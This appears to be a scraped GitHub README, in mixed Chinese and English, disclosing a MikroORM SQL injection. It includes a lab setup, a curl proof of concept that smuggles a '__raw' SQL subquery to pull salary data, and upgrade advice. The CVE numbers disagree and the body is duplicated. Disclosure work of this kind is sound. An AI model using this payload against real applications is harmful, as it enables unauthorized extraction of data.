EQSTLab/CVE-2026-34220
GitHub: EQSTLab/CVE-2026-34220
揭示并复现 MikroORM 中的 SQL 注入漏洞,帮助开发者与安全团队定位与修复对象映射层的注入风险。
Stars: 1 | Forks: 0
# CVE-2026-43220 MikroORM SQL 注入
★ CVE-2026-43220 MikroORM SQL 注入 PoC ★
https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1
# 概述
# 受影响版本 | 类别 | 版本 | |---|---| | **存在漏洞** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** | | **已修复** | MikroORM **6.4.4** & **7.0.6** |
# 影响 - 未经授权从数据库中提取敏感数据 - 破坏或意外修改现有数据库记录
# 环境 ``` docker build -t cve-2026-43220-mikroorm-vuln . #### docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
# PoC After starting the vulnerable environment, follow the steps below to reproduce the attack. ## Step 1. 发送包含 `__raw` 的恶意 payload 请求 Send a JSON body that includes a `__raw` property targeting a Custom Type column. ```bash curl -X POST http://localhost:3000/write \ -H "Content-Type: application/json" \ -d '{ "author":"x", "title":"x, "content": { "__raw": true, "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)" } #### }' ## Step 2. 检查 HTTP response Verify that the API returns a successful response without any error, indicating that MikroORM accepted the malicious payload as a valid value. ## Step 3. 确认敏感数据被 exfiltrated 到 post content 中 Verify that the `content` field of the created post contains the query result from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`), confirming that data from an unrelated table has been silently embedded into the response without any error or access control violation.
# Mitigation - Upgrade to **MikroORM 6.4.4** or later, which introduces origin verification in `isRaw()` to reject externally supplied `__raw` properties - Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to ORM layer
# Analysis - KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained - EN: ```
# 概述
# 受影响版本 | 类别 | 版本 | |---|---| | **存在漏洞** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** | | **已修复** | MikroORM **6.4.4** & **7.0.6** |
# 影响 - 未经授权从数据库中提取敏感数据 - 破坏或意外修改现有数据库记录
# 环境 ``` docker build -t cve-2026-43220-mikroorm-vuln . #### docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
# PoC After starting the vulnerable environment, follow the steps below to reproduce the attack. ## Step 1. 发送包含 `__raw` 的恶意 payload 请求 Send a JSON body that includes a `__raw` property targeting a Custom Type column. ```bash curl -X POST http://localhost:3000/write \ -H "Content-Type: application/json" \ -d '{ "author":"x", "title":"x, "content": { "__raw": true, "sql": "(SELECT group_concat(name || ': ' || salary, ' / ') FROM salaries)" } #### }' ## Step 2. 检查 HTTP response Verify that the API returns a successful response without any error, indicating that MikroORM accepted the malicious payload as a valid value. ## Step 3. 确认敏感数据被 exfiltrated 到 post content 中 Verify that the `content` field of the created post contains the query result from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`), confirming that data from an unrelated table has been silently embedded into the response without any error or access control violation.
# Mitigation - Upgrade to **MikroORM 6.4.4** or later, which introduces origin verification in `isRaw()` to reject externally supplied `__raw` properties - Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to ORM layer
# Analysis - KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained - EN: ```
标签:CISA项目, GNU通用公共许可证, Node.js, PoC, SQL注入, 暴力破解, 漏洞复现, 漏洞环境, 自定义脚本